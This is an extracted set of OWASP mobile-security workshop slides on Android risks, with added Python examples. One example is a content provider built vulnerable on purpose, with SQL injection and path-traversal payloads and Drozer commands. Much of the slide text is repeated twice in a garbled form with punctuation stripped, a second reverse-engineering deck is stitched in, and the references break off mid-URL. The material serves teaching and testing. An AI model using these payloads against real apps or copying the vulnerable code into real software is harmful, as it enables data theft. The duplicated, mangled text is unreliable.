- An encrypted db is definitely a good idea...
Broken Cryptography - example
- ...but not when you're hardcoding the password to decrypt it in code...
Broken Cryptography - real example
- NQ Vault
Broken Cryptography - mitigations
- Use known, strong cryptography implementations
- Do not hardcode keys/credentials/OAuth tokens
- Do not store keys on the device. Use password-based encryption instead
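The "how to find" and "mitigations" slides above, as one added example that is not part of the workshop: the first half scans decompiled Java (what JD-GUI/Luyten print after dex2jar) for the smells listed on the slide, hardcoded keys and weak or deprecated algorithms in JCE transformation strings; the second half shows the mitigation, deriving the database key from the user's password with PBKDF2 (hashlib, standard library) so only a random salt and the iteration count are stored. The Java snippet is a constructed stand-in; its class and field names and the iteration count are assumptions.

```python
"""Broken-crypto smells in decompiled Java, and password-based key derivation (added example)."""
import hashlib
import os
import re

WEAK_ALGORITHMS = {
    "RC4": "stream cipher with known keystream biases",
    "ARCFOUR": "RC4 under its JCE alias",
    "DESede": "3DES, legacy 64-bit block cipher",
    "DES": "56-bit key, brute-forceable",
    "MD4": "broken hash",
    "MD5": "broken hash (practical collisions)",
    "SHA1": "deprecated hash, review where it is used",
    "ECB": "mode leaks plaintext structure",
}

CRYPTO_CALL = re.compile(r'(?:Cipher|MessageDigest|Mac|KeyGenerator|SecretKeyFactory)\.getInstance\("([^"]+)"\)')
STRING_KEY = re.compile(r'(?i)(?:key|secret|password|passwd|iv|salt)\w*\s*=\s*"([^"]{4,})"')
BYTE_ARRAY_KEY = re.compile(r'(?i)(?:key|secret|iv)\w*\s*=\s*(?:new\s+byte\[\]\s*)?\{([^}]*)\}')


def weak_tokens(transformation: str):
    """Weak algorithm/mode names inside a JCE transformation such as "AES/ECB/PKCS5Padding"."""
    t = transformation.upper().replace("-", "")
    hits = []
    if "DESEDE" in t:            # check 3DES before plain DES so it is reported once
        hits.append("DESede")
        t = t.replace("DESEDE", "")
    for name in ("RC4", "ARCFOUR", "DES", "MD4", "MD5", "SHA1", "ECB"):
        if name in t:
            hits.append(name)
    return hits


def scan_java(source: str):
    """Return (line_no, issue, evidence) for each crypto smell in decompiled Java."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in CRYPTO_CALL.finditer(line):
            transformation = m.group(1)
            for name in weak_tokens(transformation):
                findings.append((no, f"weak algorithm {name}: {WEAK_ALGORITHMS[name]}", transformation))
            if transformation.upper() == "AES":
                findings.append((no, "AES without explicit mode: provider default is usually ECB", transformation))
        for m in STRING_KEY.finditer(line):
            findings.append((no, "hardcoded secret", m.group(1)))
        for m in BYTE_ARRAY_KEY.finditer(line):
            findings.append((no, "hardcoded key bytes", m.group(1).strip()))
    return findings


PBKDF2_ITERATIONS = 100_000  # assumption: tune to the device's CPU budget


def derive_key(password: str, salt: bytes = None, iterations: int = PBKDF2_ITERATIONS):
    """Derive a 256-bit key from the user's password; persist only the salt and iteration count."""
    if salt is None:
        salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return key, salt


# Constructed sample of what a decompiler shows (not from a real application).
SAMPLE_JAVA = '''\
public class DbHelper {
    private static final String DB_PASSWORD = "s3cr3tP@ss";
    private static final byte[] IV = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };

    public static byte[] encrypt(byte[] data) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        MessageDigest md = MessageDigest.getInstance("MD5");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(md.digest(DB_PASSWORD.getBytes()), "AES"));
        return c.doFinal(data);
    }
}
'''

if __name__ == "__main__":
    for no, issue, evidence in scan_java(SAMPLE_JAVA):
        print(f"line {no}: {issue} -> {evidence}")
    key, salt = derive_key("user's passphrase")
    print("derived key:", key.hex(), "salt:", salt.hex())
```

Run the scanner over the directory JD-GUI or Luyten exported (`for f in $(find out -name '*.java')`), then confirm each hit manually: a HMAC-SHA1 is flagged for review, not as broken.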
M7 - Client side injection
Client side injection - what it is
- Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
- The malicious code can come from:
  - Another application, via an Intent / content provider
  - A shared file
  - A server response
  - A third-party website
Client side injection - what to inject
- SQL injection into the local db
- XSS / WebView injection
- Directory traversal
- Intent injection
A new Android toy - the Intents
- An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection - how to find
- SQL injections:
    dz> run scanner.provider.injection -a <package_name>
- Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
- Intent injections:
    dz> run app.package.manifest <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
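What `scanner.provider.injection` and `scanner.provider.traversal` actually exercise, as an added example that is not the workshop's code: a content provider's `query()` that pastes the caller's projection and selection into SQL, and an `openFile()` that maps the URI path onto the app's files directory, each next to its fixed version. The provider is modelled in Python with sqlite3 so the payloads can be reproduced offline; the tables, rows, file names and the files directory are constructed.

```python
"""Local SQL injection and path traversal through a content provider, vulnerable and fixed (added example)."""
import os
import sqlite3
import tempfile


def make_db():
    """Constructed sample database: one table the provider exposes, one it does not."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notes(_id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    db.execute("CREATE TABLE credentials(_id INTEGER PRIMARY KEY, user TEXT, token TEXT)")
    db.executemany("INSERT INTO notes(owner, body) VALUES (?, ?)",
                   [("alice", "shopping list"), ("bob", "bob's private note")])
    db.execute("INSERT INTO credentials(user, token) VALUES ('alice', 'tok-alice-0001')")
    return db


# --- ContentProvider.query(): projection and selection arrive straight from the caller ---

def query_vulnerable(db, owner, projection="body", selection=None):
    """Mirrors a provider that concatenates caller-controlled projection/selection into SQL."""
    sql = f"SELECT {projection} FROM notes WHERE owner = '{owner}'"
    if selection:
        sql += f" AND {selection}"
    return [row[0] for row in db.execute(sql)]


ALLOWED_COLUMNS = {"_id", "owner", "body"}


def query_fixed(db, owner, projection="body", extra_filter=None):
    """Whitelist the projection and bind every value; the caller never supplies SQL text."""
    if projection not in ALLOWED_COLUMNS:
        raise ValueError(f"column not allowed: {projection}")
    sql = f"SELECT {projection} FROM notes WHERE owner = ?"
    params = [owner]
    if extra_filter:                      # (column, value) instead of raw SQL
        col, value = extra_filter
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"column not allowed: {col}")
        sql += f" AND {col} = ?"
        params.append(value)
    return [row[0] for row in db.execute(sql, params)]


# --- ContentProvider.openFile(): the URI path is mapped onto the app's files directory ---

def open_file_vulnerable(files_dir, uri_path):
    """No canonicalisation: content://.../../shared_prefs.xml walks out of files_dir."""
    with open(os.path.join(files_dir, uri_path.lstrip("/")), "rb") as f:
        return f.read()


def open_file_fixed(files_dir, uri_path):
    """Resolve the path and refuse anything that does not stay under files_dir."""
    base = os.path.realpath(files_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes files dir: {uri_path}")
    with open(target, "rb") as f:
        return f.read()


def make_sandbox():
    """Constructed app sandbox: an exportable file plus a secret one directory up."""
    root = tempfile.mkdtemp()
    files_dir = os.path.join(root, "files")
    os.mkdir(files_dir)
    with open(os.path.join(files_dir, "export.csv"), "wb") as f:
        f.write(b"exported,data")
    with open(os.path.join(root, "shared_prefs.xml"), "wb") as f:
        f.write(b'<string name="token">tok-alice-0001</string>')
    return files_dir


if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(db, "alice' OR '1'='1"))                        # every owner's notes
    print(query_vulnerable(db, "alice", projection="token FROM credentials --"))  # another table
    print(query_fixed(db, "alice' OR '1'='1"))                             # []
    files_dir = make_sandbox()
    print(open_file_vulnerable(files_dir, "../shared_prefs.xml"))
```

The two vulnerable calls correspond to what Drozer sends as `--selection "' OR '1'='1"` and `--projection "* FROM credentials --"` through `app.provider.query`, and to `app.provider.read content://<authority>/../shared_prefs.xml`; a provider that is exported without a permission (see the attack-surface check under M5) lets any app on the device do the same.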
Client side injection - real example
- The UniversalMDMClient (a built-in application of Samsung KNOX, a security feature to separate personal and professional activities)
- A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
- How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
- Always validate any user input on the server side
- For internal communication use only explicit Intents
- Avoid intent-filters for internal communication. Another application can define the same filter, and when an implicit Intent is sent the system displays a dialog so the user can pick which app handles it; the exported="false" attribute on your own Activity does not prevent that
M9 - Improper session handling
Improper session handling - what it is
- Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling - how to find
- Intercept requests with a proxy (e.g. Burp) and:
  - Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  - Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  - Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling - few facts from reality
- What we know is that "sessions have to expire"...
- ...but how long should they REALLY last?
- According to an experiment, the average application session (counted from opening an app to closing it) lasts... 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
- Invalidate the session on the server side
- Set a session expiration time adjusted to your application
- Destroy all unused session tokens
- Use only high-entropy, tested token generation resources
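The three checks from "how to find" and the four mitigations, as one added example that is not part of the workshop: a server-side session store whose tokens come from a CSPRNG, expire after an idle timeout, and are destroyed when the authentication state changes, next to a rough entropy estimate that exposes the device-ID-as-token anti-pattern. The 30-minute timeout mirrors the test on the slide; the clock is injectable so the expiry can be exercised without waiting. The ANDROID_ID value is a constructed sample.

```python
"""Session store with expiry, invalidation and high-entropy tokens (added example)."""
import hmac
import math
import secrets
import time

IDLE_TIMEOUT = 30 * 60  # assumption: 30 minutes, matching the test on the slide


class SessionStore:
    def __init__(self, idle_timeout=IDLE_TIMEOUT, clock=time.time):
        self.idle_timeout = idle_timeout
        self.clock = clock
        self._sessions = {}  # token -> {"user": ..., "last_seen": ...}

    def login(self, user):
        """Issue a fresh 256-bit token; earlier sessions of the same user are destroyed."""
        self.logout_user(user)
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "last_seen": self.clock()}
        return token

    def resolve(self, token):
        """User for a live token, or None if unknown or idle too long; refreshes the idle timer."""
        for known, sess in list(self._sessions.items()):
            if hmac.compare_digest(known, token):          # constant-time comparison
                if self.clock() - sess["last_seen"] > self.idle_timeout:
                    del self._sessions[known]              # expired: invalidate server-side
                    return None
                sess["last_seen"] = self.clock()
                return sess["user"]
        return None

    def logout(self, token):
        self._sessions.pop(token, None)

    def logout_user(self, user):
        for t in [t for t, s in self._sessions.items() if s["user"] == user]:
            del self._sessions[t]

    def switch_user(self, old_token, new_user):
        """Authentication state change: the old token dies, the new user gets a new token."""
        self.logout(old_token)
        return self.login(new_user)

    def live_sessions(self):
        return len(self._sessions)


def guessability_bits(token: str) -> float:
    """Upper bound on token entropy (alphabet size ** length); low values mean guessable."""
    return len(token) * math.log2(max(len(set(token)), 1))


def device_id_token(android_id="9774d56d682e549c"):
    """Anti-pattern from the slide: the 64-bit ANDROID_ID reused as the session token (sample value)."""
    return android_id


if __name__ == "__main__":
    store = SessionStore()
    t = store.login("alice")
    print("token bits ~", round(guessability_bits(t)), "device-id bits ~", round(guessability_bits(device_id_token())))
    print(store.resolve(t), store.resolve(device_id_token()))
```

In a pentest the same three behaviours are checked from the outside: replay a captured cookie after 30 minutes (expect a 401), log in as a second user and replay the first token (expect a 401), and compare a handful of tokens to see whether they are derived from something predictable such as the device ID.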
Thank you
pawel.rzepa@outlook.com
References
- https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
- https://github.com/ikust/hello-pinnedcerts
- http://www.exploresecurity.com/testing-for-cipher-suite-preference/
- http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
- http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
- https://manifestsecurity.com/android-application-security/
- https://mobilesecuritywiki.com/
- http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
- https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
- https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
- https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
- https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
- https://www.ssllabs.com/ssltest/
- http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
- http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
- http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
- https://github.com/linkedin/qark
- https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
- http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
- http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
- http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
- https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
